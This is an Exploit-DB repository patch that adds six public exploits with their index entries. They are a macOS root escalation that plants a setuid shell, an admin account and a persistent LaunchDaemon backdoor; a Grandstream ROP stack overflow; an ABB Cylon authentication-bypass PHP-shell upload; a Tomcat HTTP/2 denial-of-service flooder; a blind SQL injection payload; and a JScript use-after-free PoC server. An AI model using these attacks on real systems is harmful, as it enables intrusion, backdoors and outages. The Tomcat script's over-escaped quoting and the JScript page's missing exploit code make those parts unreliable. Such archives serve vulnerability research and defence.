From 2825165fedb56ce9947b8f220126f85194d972b4 Mon Sep 17 00:00:00 2001 From: Exploit-DB Date: Fri, 6 Jun 2025 00:16:28 +0000 Subject: [PATCH] DB: 2025-06-06 7 changes to exploits/shellcodes/ghdb macOS LaunchDaemon iOS 17.2 - Privilege Escalation ABB Cylon Aspect 3.08.04 DeploySource - Remote Code Execution (RCE) Apache Tomcat 10.1.39 - Denial of Service (DoS) Grandstream GSD3710 1.0.11.13 - Stack Overflow CloudClassroom PHP Project 1.0 - SQL Injection Microsoft Windows Server 2025 JScript Engine - Remote Code Execution (RCE) --- exploits/macos/local/52316.py | 100 ++++++++++++++++++++ exploits/multiple/remote/52313.py | 110 ++++++++++++++++++++++ exploits/multiple/remote/52317.txt | 97 +++++++++++++++++++ exploits/multiple/remote/52318.py | 143 +++++++++++++++++++++++++++++ exploits/php/webapps/52314.txt | 22 +++++ exploits/windows/remote/52315.py | 108 ++++++++++++++++++++++ files_exploits.csv | 6 ++ 7 files changed, 586 insertions(+) create mode 100755 exploits/macos/local/52316.py create mode 100755 exploits/multiple/remote/52313.py create mode 100644 exploits/multiple/remote/52317.txt create mode 100755 exploits/multiple/remote/52318.py create mode 100644 exploits/php/webapps/52314.txt create mode 100755 exploits/windows/remote/52315.py diff --git a/exploits/macos/local/52316.py b/exploits/macos/local/52316.py new file mode 100755 index 000000000..ef9b42ecf --- /dev/null +++ b/exploits/macos/local/52316.py @@ -0,0 +1,100 @@ +#!/usr/bin/env python3 +# Exploit Title: macOS LaunchDaemon iOS 17.2 - Privilege Escalation +# Author: Mohammed Idrees Banyamer (@banyamer_security) +# GitHub: https://github.com/mbanyamer +# Date: 2025-05-31 +# Tested on: macOS Sonoma (14.x ARM64 / x86_64) +# CVE: CVE-2025-24085 +# Type: Local Privilege Escalation +# Platform: macOS +# Author Country: Jordan +# Description: +# This local privilege escalation exploit leverages a vulnerable macOS LaunchDaemon plist configuration to execute +# arbitrary commands with root privileges. The exploit creates a root payload script that adds a root shell binary, +# creates an admin user, and installs a persistent LaunchDaemon backdoor for root access. It hijacks the +# com.apple.securemonitor LaunchDaemon plist to trigger the payload, allowing unauthorized escalation to root +# on macOS Sonoma systems. + +import os +import plistlib +import time +from pathlib import Path + +LAUNCHD_PLIST = "/Library/LaunchDaemons/com.apple.securemonitor.plist" +PAYLOAD_SCRIPT = "/tmp/.macroot_payload.sh" + +def create_payload(): + print("[+] Creating root payload script...") + payload = """#!/bin/bash +# Root shell +cp /bin/bash /tmp/.rootbash +chmod +s /tmp/.rootbash +chown root:wheel /tmp/.rootbash + +# Add admin user +sysadminctl -addUser pentest -password macOS123! -admin + +# Log file +echo "[+] Root backdoor triggered at $(date)" >> /tmp/.rootlog + +# Persistent backdoor +cat < /Library/LaunchDaemons/com.apple.backdoor.plist + + + + + Labelcom.apple.backdoor + ProgramArguments/tmp/.rootbash + RunAtLoad + + +EOF +chmod 644 /Library/LaunchDaemons/com.apple.backdoor.plist +chown root:wheel /Library/LaunchDaemons/com.apple.backdoor.plist +""" + with open(PAYLOAD_SCRIPT, "w") as f: + f.write(payload) + os.chmod(PAYLOAD_SCRIPT, 0o755) + +def hijack_launchdaemon(): + print("[+] Hijacking LaunchDaemon plist...") + if not Path(LAUNCHD_PLIST).exists(): + # create a fake one + print("[*] Creating fake LaunchDaemon plist for exploitation...") + plist_data = { + 'Label': 'com.apple.securemonitor', + 'ProgramArguments': [PAYLOAD_SCRIPT], + 'RunAtLoad': True, + } + with open(LAUNCHD_PLIST, "wb") as f: + plistlib.dump(plist_data, f) + else: + # hijack existing one + with open(LAUNCHD_PLIST, 'rb') as f: + plist = plistlib.load(f) + plist['ProgramArguments'] = [PAYLOAD_SCRIPT] + plist['RunAtLoad'] = True + with open(LAUNCHD_PLIST, 'wb') as f: + plistlib.dump(plist, f) + + os.system(f"chmod 644 {LAUNCHD_PLIST}") + os.system(f"chown root:wheel {LAUNCHD_PLIST}") + +def trigger_payload(): + print("[+] Triggering LaunchDaemon manually...") + os.system(f"sudo launchctl load -w {LAUNCHD_PLIST}") + print("[+] Done. You can now execute /tmp/.rootbash -p for root shell") + +def main(): + if os.geteuid() == 0: + print("[!] You are already root. No need to exploit.") + return + create_payload() + hijack_launchdaemon() + print("[+] Exploit completed. Reboot or run manually:") + print(f" sudo launchctl load -w {LAUNCHD_PLIST}") + print(" Then run: /tmp/.rootbash -p") + +if __name__ == "__main__": + main() \ No newline at end of file diff --git a/exploits/multiple/remote/52313.py b/exploits/multiple/remote/52313.py new file mode 100755 index 000000000..ca43d91cd --- /dev/null +++ b/exploits/multiple/remote/52313.py @@ -0,0 +1,110 @@ +#!/usr/bin/env python3 + +# Exploit Title: Grandstream GSD3710 1.0.11.13 - Stack Overflow +# Date: 2025-05-29 +# Exploit Author: Pepelux +# Vendor Homepage: https://www.grandstream.com/ +# Version: Grandstream GSD3710 - firmware:1.0.11.13 and lower +# Tested on: Linux and MacOS +# CVE: CVE-2022-2025 + +""" +Author: Jose Luis Verdeguer (@pepeluxx) + +Required: Pwntools + +Example: + +$ python 3 CVE-2022-2025.py -i DEVICE_IP -u USER -p PASSWORD +""" + + +from struct import pack +import sys +from time import sleep +import argparse +from pwn import * + + +def get_args(): + parser = argparse.ArgumentParser( + formatter_class=lambda prog: argparse.RawDescriptionHelpFormatter( + prog, max_help_position=50)) + + # Add arguments + parser.add_argument('-i', '--ip', type=str, required=True, + help='device IP address', dest="ip") + parser.add_argument('-u', '--user', type=str, required=True, + help='username', dest="user") + parser.add_argument('-p', '--pass', type=str, required=True, + help='password', dest="pwd") + + # Array for all arguments passed to script + args = parser.parse_args() + + try: + ip = args.ip + user = args.user + pwd = args.pwd + + return ip, user, pwd + except ValueError: + exit() + +def check_badchars(payload): + for i in range(5, len(payload)): + if payload[i] in [0xd, 0xa, 0x3b, 0x7c, 0x20]: + log.warn("Badchar %s detected at %#x" % (hex(payload[i]), i)) + return True + return False + + +def main(): + ip, user, pwd = get_args() + + libc_base = 0x76bb8000 + gadget = libc_base + 0x5952C # 0x0005952c: pop {r0, r4, pc}; + bin_sh = libc_base + 0xCEA9C # /bin/sh + system = libc_base + 0x2C7FD # 0x0002c7fd # system@libc + exit = libc_base + 0x2660C + + print("[*] Libc base: %#x" % libc_base) + print("[*] ROP gadget: %#x" % gadget) + print("[*] /bin/sh: %#x" % bin_sh) + print("[*] system: %#x" % system) + print("[*] exit: %#x\n" % exit) + + padding = b"A" * 320 + + payload = b'ping ' + payload += padding + payload += p32(gadget) + payload += p32(bin_sh) + payload += b"AAAA" + payload += p32(system) + payload += p32(exit) + + if check_badchars(payload): + sys.exit(0) + + count = 1 + + while True: + print('Try: %d' % count) + s = ssh(user, ip, 22, pwd) + p = s.shell(tty=False) + print(p.readuntil(b"GDS3710> ")) + p.sendline(payload) + p.sendline(b"id") + sleep(1) + data = p.read() + if str(data).find('root') > -1: + print('PWNED!') + p.interactive() + s.close() + sys.exit() + s.close() + count += 1 + +if __name__ == '__main__': + main() \ No newline at end of file diff --git a/exploits/multiple/remote/52317.txt b/exploits/multiple/remote/52317.txt new file mode 100644 index 000000000..2bad6e819 --- /dev/null +++ b/exploits/multiple/remote/52317.txt @@ -0,0 +1,97 @@ +ABB Cylon Aspect 3.08.04 DeploySource - Remote Code Execution (RCE) + + +Vendor: ABB Ltd. +Product web page: https://www.global.abb +Affected version: NEXUS Series, MATRIX-2 Series, ASPECT-Enterprise, ASPECT-Studio + Firmware: <=3.08.04 + +Summary: ASPECT is an award-winning scalable building energy management +and control solution designed to allow users seamless access to their +building data through standard building protocols including smart devices. + +Desc: ABB Cylon Aspect BMS/BAS is vulnerable to a critical flaw in the +AuthenticatedHttpServlet within its application server, enabling +remote attackers to bypass authentication by setting the Host: +127.0.0.1 header. This deceives the server into processing requests +as if they originate from localhost, granting unauthorized access +to privileged operations. This bypass grants access to privileged +functionality, including the DeploymentServlet, which is vulnerable +to directory traversal. By leveraging this, an attacker can write +arbitrary PHP files outside the intended directory scope. When combined, +these issues allow remote attackers to upload a malicious PHP shell +and execute system commands with the privileges of the web server, +leading to full system compromise. + +Tested on: GNU/Linux 3.15.10 (armv7l) + GNU/Linux 3.10.0 (x86_64) + GNU/Linux 2.6.32 (x86_64) + Intel(R) Atom(TM) Processor E3930 @ 1.30GHz + Intel(R) Xeon(R) Silver 4208 CPU @ 2.10GHz + PHP/7.3.11 + PHP/5.6.30 + PHP/5.4.16 + PHP/4.4.8 + PHP/5.3.3 + AspectFT Automation Application Server + lighttpd/1.4.32 + lighttpd/1.4.18 + Apache/2.2.15 (CentOS) + OpenJDK Runtime Environment (rhel-2.6.22.1.-x86_64) + OpenJDK 64-Bit Server VM (build 24.261-b02, mixed mode) + ErgoTech MIX Deployment Server 2.0.0 + + +Vulnerability discovered by Gjoko 'LiquidWorm' Krstic + @zeroscience + + +Advisory ID: ZSL-2025-5954 +Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2025-5954.php + + +21.04.2024 + +-- + + +$ cat project + + P R O J E C T + + .| + | | + |'| ._____ + ___ | | |. |' .---"| + _ .-' '-. | | .--'| || | _| | + .-'| _.| | || '-__ | | | || | + |' | |. | || | | | | || | + ____| '-' ' "" '-' '-.' '` |____ +░▒▓███████▓▒░░▒▓███████▓▒░ ░▒▓██████▓▒░░▒▓█▓▒░▒▓███████▓▒░ +░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░ +░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░ +░▒▓███████▓▒░░▒▓███████▓▒░░▒▓████████▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░ +░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░ +░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░ +░▒▓███████▓▒░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░ + ░▒▓████████▓▒░▒▓██████▓▒░ ░▒▓██████▓▒░ + ░▒▓█▓▒░░░░░░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░ + ░▒▓█▓▒░░░░░░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░░░░░░ + ░▒▓██████▓▒░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒▒▓███▓▒░ + ░▒▓█▓▒░░░░░░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░ + ░▒▓█▓▒░░░░░░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░ + ░▒▓█▓▒░░░░░░░░▒▓██████▓▒░ ░▒▓██████▓▒░ + + +$ curl "http://192.168.73.31:7226/servlets/DeploymentServlet\ +> ?RequestType=DeploySource\ +> &filename=../../../home/MIX_CMIX/htmlroot/zsl.php\ +> &directory=/" \ +> --data-binary @zsl.php \ +> -H "Host: 127.0.0.1" \ +> -H "Content-Type: application/octet-stream" +200 Successful200 Successful + +$ curl http://192.168.73.31/zsl.php?cmd=id;ls -al zsl.php +uid=48(apache) gid=48(apache) groups=48(apache),0(root) context=system_u:system_r:httpd_t:s0 +-rw-r--r--. 1 root root 106 Jun 4 13:29 zsl.php \ No newline at end of file diff --git a/exploits/multiple/remote/52318.py b/exploits/multiple/remote/52318.py new file mode 100755 index 000000000..8d14e4a5f --- /dev/null +++ b/exploits/multiple/remote/52318.py @@ -0,0 +1,143 @@ +# Exploit Title: Apache Tomcat 10.1.39 - Denial of Service (DOS) +# Author: Abdualhadi khalifa +# CVE: CVE-2025-31650 + +import httpx +import asyncio +import random +import urllib.parse +import sys +import socket +from colorama import init, Fore, Style + +init() + +class TomcatKiller: + def __init__(self): + self.success_count = 0 + self.error_count = 0 + self.invalid_priorities = [ + \\\"u=-1, q=2\\\", + \\\"u=4294967295, q=-1\\\", + \\\"u=-2147483648, q=1.5\\\", + \\\"u=0, q=invalid\\\", + \\\"u=1/0, q=NaN\\\", + \\\"u=1, q=2, invalid=param\\\", + \\\"\\\", + \\\"u=1, q=1, u=2\\\", + \\\"u=99999999999999999999, q=0\\\", + \\\"u=-99999999999999999999, q=0\\\", + \\\"u=, q=\\\", + \\\"u=1, q=1, malformed\\\", + \\\"u=1, q=, invalid\\\", + \\\"u=-1, q=4294967295\\\", + \\\"u=invalid, q=1\\\", + \\\"u=1, q=1, extra=\\\", + \\\"u=1, q=1; malformed\\\", + \\\"u=1, q=1, =invalid\\\", + \\\"u=0, q=0, stream=invalid\\\", + \\\"u=1, q=1, priority=recursive\\\", + \\\"u=1, q=1, %invalid%\\\", + \\\"u=0, q=0, null=0\\\", + ] + + async def validate_url(self, url): + try: + parsed_url = urllib.parse.urlparse(url) + if not parsed_url.scheme or not parsed_url.hostname: + raise ValueError(\\\"Invalid URL format. Use http:// or https://\\\") + host = parsed_url.hostname + port = parsed_url.port if parsed_url.port else (443 if parsed_url.scheme == \\\'https\\\' else 80) + return host, port + except Exception: + print(f\\\"{Fore.RED}Error: Invalid URL. Use http:// or https:// format.{Style.RESET_ALL}\\\") + sys.exit(1) + + async def check_http2_support(self, host, port): + async with httpx.AsyncClient(http2=True, verify=False, timeout=5, limits=httpx.Limits(max_connections=1000)) as client: + try: + response = await client.get(f\\\"https://{host}:{port}/\\\", headers={\\\"user-agent\\\": \\\"TomcatKiller\\\"}) + if response.http_version == \\\"HTTP/2\\\": + print(f\\\"{Fore.GREEN}HTTP/2 supported! Proceeding ...{Style.RESET_ALL}\\\") + return True + else: + print(f\\\"{Fore.YELLOW}Error: HTTP/2 not supported. This exploit requires HTTP/2.{Style.RESET_ALL}\\\") + return False + except Exception: + print(f\\\"{Fore.RED}Error: Could not connect to {host}:{port}.{Style.RESET_ALL}\\\") + return False + + async def send_invalid_priority_request(self, host, port, num_requests, task_id): + async with httpx.AsyncClient(http2=True, verify=False, timeout=0.3, limits=httpx.Limits(max_connections=1000)) as client: + url = f\\\"https://{host}:{port}/\\\" + for i in range(num_requests): + headers = { + \\\"priority\\\": random.choice(self.invalid_priorities), + \\\"user-agent\\\": f\\\"TomcatKiller-{task_id}-{random.randint(1, 1000000)}\\\", + \\\"cache-control\\\": \\\"no-cache\\\", + \\\"accept\\\": f\\\"*/*; q={random.random()}\\\", + } + try: + await client.get(url, headers=headers) + self.success_count += 1 + except Exception: + self.error_count += 1 + + async def monitor_server(self, host, port): + while True: + try: + with socket.create_connection((host, port), timeout=2): + print(f\\\"{Fore.YELLOW}Target {host}:{port} is reachable.{Style.RESET_ALL}\\\") + except Exception: + print(f\\\"{Fore.RED}Target {host}:{port} unreachable or crashed!{Style.RESET_ALL}\\\") + break + await asyncio.sleep(2) + + async def run_attack(self, host, port, num_tasks, requests_per_task): + print(f\\\"{Fore.GREEN}Starting attack on {host}:{port}...{Style.RESET_ALL}\\\") + print(f\\\"Tasks: {num_tasks}, Requests per task: {requests_per_task}\\\") + print(f\\\"{Fore.YELLOW}Monitor memory manually via VisualVM or check catalina.out for OutOfMemoryError.{Style.RESET_ALL}\\\") + + monitor_task = asyncio.create_task(self.monitor_server(host, port)) + tasks = [self.send_invalid_priority_request(host, port, requests_per_task, i) for i in range(num_tasks)] + await asyncio.gather(*tasks) + monitor_task.cancel() + + total_requests = num_tasks * requests_per_task + success_rate = (self.success_count / total_requests * 100) if total_requests > 0 else 0 + print(f\\\"\\\\n{Fore.MAGENTA}===== Attack Summary ====={Style.RESET_ALL}\\\") + print(f\\\"Target: {host}:{port}\\\") + print(f\\\"Total Requests: {total_requests}\\\") + print(f\\\"Successful Requests: {self.success_count}\\\") + print(f\\\"Failed Requests: {self.error_count}\\\") + print(f\\\"Success Rate: {success_rate:.2f}%\\\") + print(f\\\"{Fore.MAGENTA}========================={Style.RESET_ALL}\\\") + +async def main(): + print(f\\\"{Fore.BLUE}===== TomcatKiller - CVE-2025-31650 ====={Style.RESET_ALL}\\\") + print(f\\\"Developed by: @absholi7ly\\\") + print(f\\\"Exploits memory leak in Apache Tomcat (10.1.10-10.1.39) via invalid HTTP/2 priority headers.\\\") + print(f\\\"{Fore.YELLOW}Warning: For authorized testing only. Ensure HTTP/2 and vulnerable Tomcat version.{Style.RESET_ALL}\\\\n\\\") + + url = input(f\\\"{Fore.CYAN}Enter target URL (e.g., https://localhost:8443): {Style.RESET_ALL}\\\") + num_tasks = int(input(f\\\"{Fore.CYAN}Enter number of tasks (default 300): {Style.RESET_ALL}\\\") or 300) + requests_per_task = int(input(f\\\"{Fore.CYAN}Enter requests per task (default 100000): {Style.RESET_ALL}\\\") or 100000) + + tk = TomcatKiller() + host, port = await tk.validate_url(url) + + if not await tk.check_http2_support(host, port): + sys.exit(1) + + await tk.run_attack(host, port, num_tasks, requests_per_task) + +if __name__ == \\\"__main__\\\": + try: + asyncio.run(main()) + print(f\\\"{Fore.GREEN}Attack completed!{Style.RESET_ALL}\\\") + except KeyboardInterrupt: + print(f\\\"{Fore.YELLOW}Attack interrupted by user.{Style.RESET_ALL}\\\") + sys.exit(0) + except Exception as e: + print(f\\\"{Fore.RED}Unexpected error: {e}{Style.RESET_ALL}\\\") + sys.exit(1) \ No newline at end of file diff --git a/exploits/php/webapps/52314.txt b/exploits/php/webapps/52314.txt new file mode 100644 index 000000000..781699860 --- /dev/null +++ b/exploits/php/webapps/52314.txt @@ -0,0 +1,22 @@ +# Exploit Title: CloudClassroom PHP Project 1.0 - SQL Injection +# Google Dork: inurl:CloudClassroom-PHP-Project-master +# Date: 2025-05-30 +# Exploit Author: Sanjay Singh +# Vendor Homepage: https://github.com/mathurvishal/CloudClassroom-PHP-Project +# Software Link: https://github.com/mathurvishal/CloudClassroom-PHP-Project/archive/refs/heads/master.zip +# Version: 1.0 +# Tested on: XAMPP on Windows 10 / Ubuntu 22.04 +# CVE : CVE-2025-45542 + +# Description: +# A time-based blind SQL injection vulnerability exists in the pass parameter +# of the registrationform endpoint. An attacker can exploit this issue by sending +# a malicious POST request to delay server response and infer data. + +# PoC Request (simulated using curl): + +curl -X POST http://localhost/CloudClassroom-PHP-Project-master/registrationform \ + -H "Content-Type: application/x-www-form-urlencoded" \ + -d "addrs=3137%20Laguna%20Street&course=1&dob=1967/1/1&email=testing@example.com&faname=test&fname=test&gender=Female&lname=test&pass=u]H[ww6KrA9F.x-F0'XOR(if(now()=sysdate(),sleep(6),0))XOR'Z&phno=94102&sub=" + +# The server response will be delayed if the SQL condition is true, confirming the injection point. \ No newline at end of file diff --git a/exploits/windows/remote/52315.py b/exploits/windows/remote/52315.py new file mode 100755 index 000000000..b3d913f11 --- /dev/null +++ b/exploits/windows/remote/52315.py @@ -0,0 +1,108 @@ +#!/usr/bin/env python3 +# Exploit Title: Microsoft Windows Server 2025 JScript Engine - Remote Code Execution (RCE) +# Exploit Author: Mohammed Idrees Banyamer +# Instagram: @@banyamer_security +# GitHub: https://github.com/mbanyamer +# Date: 2025-05-31 +# CVE: CVE-2025-30397 +# Vendor: Microsoft +# Affected Versions: Windows Server 2025 (build 25398 and prior) +# Tested on: Windows Server 2025 + IE11 (x86) +# Type: Remote +# Platform: Windows +# Vulnerability Type: Use-After-Free (JScript Engine) +# Description: This PoC exploits a Use-After-Free vulnerability in jscript.dll to achieve code execution via heap spraying. The shellcode executes calc.exe as a demonstration of code execution. + +# ============================ +# Usage Instructions: +# +# 1. Save this script as `exploit_server.py`. +# 2. Run it with Python 3: +# $ python3 exploit_server.py +# 3. On the vulnerable target (Windows Server 2025 + IE11): +# Open Internet Explorer and navigate to: +# http://:8080/poc_cve_2025_30397.html +# +# If the target is vulnerable, calc.exe will be executed. +# ============================ + +import http.server +import socketserver + +PORT = 8080 + +HTML_CONTENT = b""" + + + + PoC - CVE-2025-30397 + + + +

Exploit PoC: CVE-2025-30397

+

Author: Mohammed Idrees Banyamer

+

Instagram: @banyamer_security

+

GitHub: mbanyamer

+

This demonstration is for ethical testing only. Triggering the vulnerability on vulnerable Internet Explorer installations will lead to execution of calc.exe via shellcode.

+ + +""" + +class Handler(http.server.SimpleHTTPRequestHandler): + def do_GET(self): + if self.path == '/' or self.path == '/poc_cve_2025_30397.html': + self.send_response(200) + self.send_header("Content-type", "text/html") + self.send_header("Content-length", str(len(HTML_CONTENT))) + self.send_header("X-Content-Type-Options", "nosniff") + self.send_header("X-Frame-Options", "SAMEORIGIN") + self.send_header("Content-Security-Policy", "default-src 'self'") + self.send_header("Cache-Control", "no-cache, no-store, must-revalidate") + self.send_header("Pragma", "no-cache") + self.send_header("Expires", "0") + self.end_headers() + self.wfile.write(HTML_CONTENT) + else: + self.send_error(404, "File Not Found") + +def run(): + print(f"Serving PoC on http://0.0.0.0:{PORT}/poc_cve_2025_30397.html") + with socketserver.TCPServer(("", PORT), Handler) as httpd: + try: + httpd.serve_forever() + except KeyboardInterrupt: + print("\nServer stopped.") + +if __name__ == "__main__": + run() \ No newline at end of file diff --git a/files_exploits.csv b/files_exploits.csv index aea095c41..efa451980 100644 --- a/files_exploits.csv +++ b/files_exploits.csv @@ -9268,6 +9268,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd 47708,exploits/macos/local/47708.txt,"macOS 10.14.6 - root->kernel Privilege Escalation via update_dyld_shared_cache",2019-11-22,"Google Security Research",local,macos,,2019-11-22,2019-11-22,1,,,,,,https://bugs.chromium.org/p/project-zero/issues/detail?id=1929 47400,exploits/macos/local/47400.md,"macOS 18.7.0 Kernel - Local Privilege Escalation",2019-09-19,A2nkF,local,macos,,2019-09-19,2019-09-19,0,,,,,,https://github.com/A2nkF/macOS-Kernel-Exploit/tree/81765a91cd299b6c05fd3edf7afe557405c949fa 48464,exploits/macos/local/48464.py,"MacOS 320.whatis Script - Privilege Escalation",2020-05-12,"Csaba Fitzl",local,macos,,2020-05-12,2020-05-12,0,,,,,, +52316,exploits/macos/local/52316.py,"macOS LaunchDaemon iOS 17.2 - Privilege Escalation",2025-06-05,"Mohammed Idrees Banyamer",local,macos,,2025-06-05,2025-06-05,0,CVE-2025-24085,,,,, 43217,exploits/macos/local/43217.sh,"Murus 1.4.11 - Local Privilege Escalation",2017-12-06,"Mark Wadham",local,macos,,2017-12-06,2017-12-06,0,,Local,,,http://www.exploit-db.commurus-1.4.11.zip,https://m4.rkw.io/blog/murus-firewall-1411-escalation-hihack--root-privesc.html 41854,exploits/macos/local/41854.txt,"Proxifier for Mac 2.17/2.18 - Privesc Escalation",2017-04-11,"Mark Wadham",local,macos,,2017-04-11,2017-04-12,0,CVE-2017-7643,Local,,,,https://m4.rkw.io/blog/cve20177643-local-root-privesc-in-proxifier-for-mac--218.html 41853,exploits/macos/local/41853.txt,"Proxifier for Mac 2.18 - Multiple Vulnerabilities",2017-04-11,Securify,local,macos,,2017-04-11,2017-04-11,0,,,,,,https://www.securify.nl/advisory/SFY20170401/multiple_local_privilege_escalation_vulnerabilities_in_proxifier_for_mac.html @@ -10622,6 +10623,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd 31921,exploits/multiple/remote/31921.txt,"3D-FTP 8.01 - 'LIST' / 'MLSD' Directory Traversal",2008-06-16,"Tan Chew Keong",remote,multiple,,2008-06-16,2014-02-26,1,CVE-2008-2822;OSVDB-46155,,,,,https://www.securityfocus.com/bid/29749/info 32167,exploits/multiple/remote/32167.txt,"8E6 Technologies R3000 - Host Header Internet Filter Security Bypass",2008-08-05,nnposter,remote,multiple,,2008-08-05,2014-03-11,1,CVE-2008-3494;OSVDB-47517,,,,,https://www.securityfocus.com/bid/30541/info 52305,exploits/multiple/remote/52305.py,"ABB Cylon Aspect 3.08.03 - Guest2Root Privilege Escalation",2025-05-25,LiquidWorm,remote,multiple,,2025-05-25,2025-05-25,0,CVE-n/a,,,,, +52317,exploits/multiple/remote/52317.txt,"ABB Cylon Aspect 3.08.04 DeploySource - Remote Code Execution (RCE)",2025-06-05,LiquidWorm,remote,multiple,,2025-06-05,2025-06-05,0,CVE-n/a,,,,, 25019,exploits/multiple/remote/25019.txt,"ABC2MIDI 2004-12-04 - Multiple Stack Buffer Overflow Vulnerabilities",2004-12-15,"Limin Wang",remote,multiple,,2004-12-15,2013-04-30,1,CVE-2004-1256;OSVDB-12426,,,,,https://www.securityfocus.com/bid/12019/info 25018,exploits/multiple/remote/25018.txt,"ABC2MTEX 1.6.1 - Process ABC Key Field Buffer Overflow",2004-12-15,"Limin Wang",remote,multiple,,2004-12-15,2013-04-30,1,,,,,,https://www.securityfocus.com/bid/12018/info 32382,exploits/multiple/remote/32382.txt,"Accellion File Transfer Appliance Error Report Message - Open Email Relay",2008-09-15,"Eric Beaulieu",remote,multiple,,2008-09-15,2014-03-20,1,CVE-2008-7012;OSVDB-48242,,,,,https://www.securityfocus.com/bid/31178/info @@ -10742,6 +10744,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd 9994,exploits/multiple/remote/9994.txt,"Apache Tomcat - Cookie Quote Handling Remote Information Disclosure",2009-11-09,"John Kew",remote,multiple,,2009-11-08,,1,,,,,, 9995,exploits/multiple/remote/9995.txt,"Apache Tomcat - Form Authentication 'Username' Enumeration",2009-11-09,"D. Matscheko",remote,multiple,,2009-11-08,,1,,,,,, 27095,exploits/multiple/remote/27095.txt,"Apache Tomcat / Geronimo 1.0 - 'Sample Script cal2.jsp?time' Cross-Site Scripting",2006-01-16,"Oliver Karow",remote,multiple,,2006-01-16,2013-07-25,1,CVE-2006-0254;OSVDB-22458,,,,,https://www.securityfocus.com/bid/16260/info +52318,exploits/multiple/remote/52318.py,"Apache Tomcat 10.1.39 - Denial of Service (DoS)",2025-06-05,"Abdualhadi khalifa",remote,multiple,,2025-06-05,2025-06-05,0,CVE-2025-31650,,,,, 20131,exploits/multiple/remote/20131.txt,"Apache Tomcat 3.1 - Path Revealing",2000-07-20,"ET LoWNOISE",remote,multiple,,2000-07-20,2012-07-31,1,CVE-2000-0759;OSVDB-674,,,,,https://www.securityfocus.com/bid/1531/info 33379,exploits/multiple/remote/33379.txt,"Apache Tomcat 3.2 - 404 Error Page Cross-Site Scripting",2009-09-02,MustLive,remote,multiple,,2009-09-02,2014-05-16,1,,,,,,https://www.securityfocus.com/bid/37149/info 21492,exploits/multiple/remote/21492.txt,"Apache Tomcat 3.2.3/3.2.4 - 'RealPath.jsp' Information Disclosuree",2002-05-29,"Richard Brain",remote,multiple,,2002-05-29,2017-07-11,1,CVE-2002-2007;OSVDB-13304,,,,,https://www.securityfocus.com/bid/4878/info @@ -11000,6 +11003,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd 39292,exploits/multiple/remote/39292.pl,"Granding MA300 - Traffic Sniffing Man In The Middle Fingerprint PIN Disclosure",2014-08-26,"Eric Sesterhenn",remote,multiple,,2014-08-26,2018-01-11,1,CVE-2014-5380;OSVDB-110460,,,,,https://www.securityfocus.com/bid/69390/info 39293,exploits/multiple/remote/39293.pl,"Granding MA300 - Weak Pin Encryption Brute Force",2014-08-26,"Eric Sesterhenn",remote,multiple,,2014-08-26,2016-01-22,1,CVE-2014-5381;OSVDB-110456,,,,,https://www.securityfocus.com/bid/69390/info 52303,exploits/multiple/remote/52303.py,"Grandstream GSD3710 1.0.11.13 - Stack Buffer Overflow",2025-05-25,Pepelux,remote,multiple,,2025-05-25,2025-05-25,0,CVE-2022-2070,,,,, +52313,exploits/multiple/remote/52313.py,"Grandstream GSD3710 1.0.11.13 - Stack Overflow",2025-06-05,Pepelux,remote,multiple,,2025-06-05,2025-06-05,0,CVE-2022-2025,,,,, 33203,exploits/multiple/remote/33203.txt,"GreenSQL Firewall 0.9.x - WHERE Clause Security Bypass",2009-09-02,"Johannes Dahse",remote,multiple,,2009-09-02,2014-05-06,1,CVE-2008-6992;OSVDB-48910,,,,,https://www.securityfocus.com/bid/36209/info 38049,exploits/multiple/remote/38049.txt,"Greenstone - Multiple Vulnerabilities",2012-11-23,AkaStep,remote,multiple,,2012-11-23,2016-12-18,1,,,,,,https://www.securityfocus.com/bid/56662/info 31912,exploits/multiple/remote/31912.txt,"GSC Client 1.00 2067 - Privilege Escalation",2008-06-14,"Michael Gray",remote,multiple,,2014-04-09,2014-04-09,0,CVE-2008-7170;OSVDB-53482,,,,,https://www.securityfocus.com/bid/29718/info @@ -16131,6 +16135,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd 11162,exploits/php/webapps/11162.txt,"CLONEBID B2B Marketplace - Multiple Vulnerabilities",2010-01-16,"Hamza 'MizoZ' N.",webapps,php,,2010-01-15,,1,OSVDB-61811,,,,, 47544,exploits/php/webapps/47544.py,"ClonOs WEB UI 19.09 - Improper Access Control",2019-10-25,"İbrahim Hakan Şeker",webapps,php,,2019-10-25,2019-10-25,0,CVE-2019-18418,,,,, 30070,exploits/php/webapps/30070.html,"ClonusWiki 0.5 - 'index.php' HTML Injection",2007-05-22,"John Martinelli",webapps,php,,2007-05-22,2013-12-06,1,,,,,,https://www.securityfocus.com/bid/24101/info +52314,exploits/php/webapps/52314.txt,"CloudClassroom PHP Project 1.0 - SQL Injection",2025-06-05,"Sanjay Singh",webapps,php,,2025-06-05,2025-06-05,0,CVE-2025-45542,,,,, 19549,exploits/php/webapps/19549.txt,"CLscript Classified Script 3.0 - SQL Injection",2012-07-03,"Daniel 